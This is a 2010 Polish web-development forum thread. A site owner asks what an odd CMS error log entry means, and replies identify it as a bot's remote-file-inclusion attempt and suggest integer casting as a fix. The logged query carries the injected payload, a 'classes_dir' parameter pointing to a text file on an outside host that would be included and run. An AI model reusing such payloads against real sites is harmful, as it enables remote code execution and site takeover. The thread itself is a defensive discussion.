 [bezpieczeństwo] Co chce zrobić ten bot, a może to nie bot. |
| [bezpieczeństwo] Co chce zrobić ten bot, a może to nie bot. |
 6.02.2010, 16:12:51
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 1 Pomógł: 0 Dołączył: 6.02.2010 Ostrzeżenie: (0%) 
 |
Jak w temacie, może są osoby które mogą pomóc aby zabezpieczyć problem na przyszłość. W logach błędów pracy CMSa mam takie coś:
select st.idst, st.stprzekierowanie, st.ids, st.stcountform, s.ids, s.idsp, s.snazwa, s.smodul, s.slang, m.idm, m.mnazwa, m.mtabela, m.mkomentarz, m.mbox, m.mlimit, m.morder, m.mview, m.mparametr, m.mlang from serwis s, modul m, mod_strona st where st.staktywny=Tak and m.idm=st.idm and s.ids=st.ids and st.idst=74//classes/adodbt/sql.php?classes_dir=http://jal2.fileave.com/id1.txt?  order by st.stkolejnosc limit 0,1Something is wrong in your syntax obok /classes/adodbt/sql.php?classes_dir=http://jal2.fileave.com/id1.txt? order by w linii 1idst to id strony, pod tą stroną znajduje się formularz wysyłający emaile do obsługi strony. O co loto, co za próba włamu może to być. Dzięki za pomoc. Ten post edytował Basic_M 6.02.2010, 16:13:56 |
 |
 
|
 |
|
6.02.2010, 16:19:57
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 855 Pomógł: 145 Dołączył: 17.07.2008 Skąd: High Memory Area Ostrzeżenie: (0%)
|
Jak parametr w zapytaniu ma być liczbą całkowitą, to rzutuj go na liczbę całkowitą
Kod $zmienna = (int)$zmienna i więcej taki bajer nie przejdzie. |
|
|
|
|
6.02.2010, 22:25:11
Post
#3
|
|
 Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów |
Cytat O co loto, co za próba włamu może to być. Dzięki za pomoc. Często wykorzystywany bot. Jeśli skrypt nie jest zabezpieczony, załącza skrypt z URL, który jest po prostu trojanem - umożliwia zdalne wykonanie dowolnego kodu, polecenia, etc. --------------------  ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW! |
|
|
|
 |
|
Wersja Lo-Fi | Aktualny czas: 19.07.2025 - 08:32 |
